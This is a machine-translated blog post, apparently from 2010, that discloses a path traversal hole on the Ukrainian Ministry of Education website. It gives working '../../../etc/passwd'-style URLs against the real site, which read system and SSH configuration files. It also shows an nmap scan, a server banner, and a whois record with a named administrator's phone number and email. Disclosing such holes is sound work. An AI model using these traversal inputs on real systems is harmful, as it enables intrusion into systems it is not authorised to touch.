Ministry of Education and Science of Ukraine ... Education 2.0 speak?

Today, comrades shared an interesting link

• www.mon.gov.ua/main.php?query=../../../etc/passwd

It became interesting to look, but what is there openly?



Silently:

  $ nmap www.mon.gov.ua

 Starting Nmap 4.11 (http://www.insecure.org/nmap/) at 2010-04-09 10:40 EEST
 Interesting ports on 212.111.193.189:
 Not shown: 1679 filtered ports
 PORT STATE SERVICE
 80 / tcp open http

 Nmap finished: 1 IP address (1 host up) scanned in 76.253 seconds 

Well ... Also an option ... port 80 and only ... It is a pity ...

')

 $ w3m -dump_head www.mon.gov.ua
 HTTP / 1.1 200 OK
 Date: Fri, 09 Apr 2010 07:43:50 GMT
 Server: Apache / 2.2.6 (Fedora)
 X-Powered-By: PHP / 5.1.6
 Connection: close
 Content-Type: text / html

Well then, just research excitement began to cut through:

• www.mon.gov.ua/main.php?query=../../../etc/rc
• www.mon.gov.ua/main.php?query=../../../etc/rc.local
• www.mon.gov.ua/main.php?query=../../../etc/ssh/ssh_config
• www.mon.gov.ua/main.php?query=../../../proc/cpuinfo
• www.mon.gov.ua/main.php?query=../../../proc/meminfo

I decided to stop at this ... I stopped and scored:

  $ whois mon.gov.ua
 % This is the Ukrainian Whois query server #F.
 % Rights restricted by copyright.
 %


 %% .UA whois
 % Domain Record:
 % =============
 domain: mon.gov.ua
 admin-c: AVB40-UANIC
 tech-c: AVB40-UANIC
 status: OK-UNTIL 20100605000000
 nserver: ns.secondary.net.ua
 nserver: ns.mon.gov.ua
 remark: Ministry of Education and Science of Ukraine
 remark: Ministry of Science and Science of Ukraine
 changed: UARR149-UANIC 20090713150319
 source: UANIC


 % Glue Record:
 % ===========
 nserver: ns.mon.gov.ua
 ip-addr: 88.81.234.94

 % Administrative Contact:
 % ======================
 nic-handle: AVB40-UANIC
 person: Anatoly Valentinovich Bortnikov
 address: Taras Shevchenko, 16
 address: 01601 KIЇV
 address: UA
 phone: +380 (44) 2463909
 e-mail: irvin@mon.gov.ua
 mnt-by: NONE
 changed: AVB40-UANIC 20090710174047
 source: UANIC

 % Technical Contact:
 % =================
 nic-handle: AVB40-UANIC
 person: Anatoly Valentinovich Bortnikov
 address: Taras Shevchenko, 16
 address: 01601 KIЇV
 address: UA
 phone: +380 (44) 2463909
 e-mail: irvin@mon.gov.ua
 mnt-by: NONE
 changed: AVB40-UANIC 20090710174047
 source: UANIC


 %% .UA whois

I called ... I introduced myself (And from whom should I hide and why?). I tried to tell. To which I heard in response that they have such a hole, but it does not represent any danger, that it is only read only, etc. Well, I answered simply: “Yes (?), Okay” ...



Then he looked that this hole was " at dinner a hundred years ." Well, well, since nobody cares about such things, why should they care about me, do I really need the most?



But that's what was thought of. In principle, this is not a critical site, not a critical project. But if in the course of two years, people are just too lazy to clean holes (I’m not talking about vulnerabilities), what can happen if more other, more weighty educational and other projects start to take root? They said that the site was developed by some institute, but I thought: some student passed the session! :( All this is sad ...



UPD: It turns out that this topic has already opened up a bit ...

UPD: Hole on the site, as they say, covered . Covered literally immediately after they felt habroefekt:

Thanks for the information!

Our programmers are already doing code ...



Unfortunately, today we may not have time, the fact is that the author of the site quit 2 years ago ...



So far I have to shut off the entire list of attacking (about 2500) addresses on the firewall so that the site does not crash over the weekend.

I understand that the ugly decision, but temporarily so.

Thanks Habra, we make this world better!